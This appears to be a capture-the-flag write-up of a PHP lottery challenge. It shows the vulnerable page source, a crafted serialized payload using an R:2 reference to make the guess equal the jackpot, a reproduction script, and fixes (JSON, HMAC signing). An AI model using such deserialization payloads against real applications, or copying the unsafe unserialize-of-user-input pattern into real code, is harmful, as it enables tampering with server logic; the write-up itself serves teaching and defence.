```php
} else {
    echo "<br><br><center><strong><font color='white'>Wrong! True Six Numbers Are: </font></strong></center>"
        . "<br><center><strong><font color='white' size='25'>" . $obj->jackpot . "</font></strong></center><br>";
}
} else {
    echo "<center><strong><font color='white'>- Something wrong, do not hack us please! -</font></strong></center>";
}
} else {
    echo "";
}
?>
<center>
<br><h2><font color='yellow' size=8>-- TSU</font><font color='red' size=8>LOTT --</font></h2>
<p><p><font color='white'>Input your code to win jackpot!</font><p>
<form>
<input type="text" name="input" /><p><p>
<button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<?php
if (isset($_GET['gen_code']) && !empty($_GET['gen_code'])) {
    $temp = new Object;
    $temp->enter = $_GET['gen_code'];
    $code = base64_encode(serialize($temp));
    echo '<center><font color=\'white\'>Here is your code, please use it to Lott: <strong>' . $code . '</strong></font></center>';
}
?>
<center>
<font color='white'>-----------------------------------------------------------------------------------------------------------------------------</font>
<h3><font color='white'>Take code</font></h3><p>
<p><font color='white'>Pick your six numbers (Ex: 150294118876)</font><p>
<form>
<input type="text" name="gen_code" maxlength="17" /><p><p>
<button type="submit" name="btn-submit" value="go">send</button>
</form>
</center>
<?php
if (isset($_GET['is_debug']) && $_GET['is_debug'] === '1') {
    show_source(__FILE__);
}
?>
<!-- GET is_debug=1 -->
</body>
```
Looking at the code, the flow is as follows: we first submit six numbers such as 67 86 93 92 41 76; the server stores them in an Object, serializes it, base64-encodes the result and hands it back to us as our "code". We then submit that code, and the server base64-decodes it, unserializes it, and compares our number with the jackpot number.
If we decode the base64 string, the serialized object looks like this:
Setting the jackpot property ourselves does not work, because the random jackpot value is assigned after unserialization, so it overrides whatever value we supplied.
So what we need is to make the enter value a reference to the jackpot value, much like a symlink.
Reading up on the PHP serialization format, we find a little-known and poorly documented feature: references. Instead of a plain value such as s:17:"...", which stores a string of 17 characters, we can write R:x, which means "a reference to the value stored in slot x". Slots are numbered from 1 in the order the values appear in the serialized data, and the object itself occupies slot 1, so the first property value lands in slot 2.
So let's build a serialized object whose enter value is a reference to jackpot:
```text
O:6:"Object":2:{s:7:"jackpot";N;s:5:"enter";R:2;}
```
When the server then assigns the string with the random numbers to jackpot, the same string is effectively assigned to our enter variable, because both properties now point at one and the same value, and the comparison succeeds.
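The whole exchange, as an added example that is not the challenge's own code: it replays the server logic described above (unserialize, then draw the jackpot, then compare), shows that a plain code loses, and shows that the R:2 payload wins. The challenge class is called Object; it is renamed Lott here because Object can no longer be declared as a class name in PHP 7.2 and later, so the serialized strings below say `O:4:"Lott"` instead of `O:6:"Object"`. How the real server draws and compares the jackpot (`checkCode`, the six two-digit draws, the `==` comparison) is an assumption; only the ordering of the steps is taken from the writeup.

```php
<?php
// Added example, not the challenge's code. Class renamed from "Object" to
// "Lott" because "Object" is not a valid class name in PHP >= 7.2.
// checkCode() is an assumed reconstruction of the server side: it keeps the
// order the writeup describes (unserialize, then assign jackpot, then compare).

class Lott
{
    public $jackpot;
    public $enter;
}

// Server side (assumed): decode the submitted code, draw the jackpot, compare.
function checkCode(string $code): bool
{
    $obj = @unserialize(base64_decode($code));
    if (!($obj instanceof Lott)) {
        return false;                       // "do not hack us please"
    }
    $digits = '';
    for ($i = 0; $i < 6; $i++) {
        $digits .= sprintf('%02d', random_int(0, 99));   // six two-digit numbers
    }
    $obj->jackpot = $digits;                // assigned AFTER unserialize
    return $obj->enter == $obj->jackpot;
}

// 1) What the "Take code" form produces: enter holds a fixed string.
//    jackpot is drawn afterwards, so the comparison fails (barring a 1 in 10^12 hit).
$plain = new Lott;
$plain->enter = '150294118876';
echo serialize($plain), "\n";              // ... s:5:"enter";s:12:"150294118876";}
$plainCode = base64_encode(serialize($plain));
var_dump(checkCode($plainCode));

// 2) The reference payload. Hand-crafted: the object is slot 1 and jackpot's
//    value is slot 2, so R:2 turns enter into a PHP reference to jackpot.
$handmade = 'O:4:"Lott":2:{s:7:"jackpot";N;s:5:"enter";R:2;}';

//    serialize() produces the same bytes on its own: it emits R:n whenever it
//    meets a PHP reference (&) to a value it has already written.
$ref = new Lott;
$ref->enter = &$ref->jackpot;
$generated = serialize($ref);
var_dump($generated === $handmade);

// 3) Submit it. Whatever the server assigns to jackpot is now also enter,
//    so checkCode() succeeds every time.
$winningCode = base64_encode($generated);
echo $winningCode, "\n";
var_dump(checkCode($winningCode));
```

Two details worth remembering: the reference must be an uppercase `R`. Lowercase `r:n` only reuses an object instance already seen and copies the value for scalars, so with `r:2` enter would simply become null and stay null when jackpot is assigned. And the root cause is the same as in every PHP unserialize bug: the server deserializes attacker-controlled bytes. Encoding the code as JSON, or at least signing the serialized blob with an HMAC and verifying it before `unserialize()`, would have closed this.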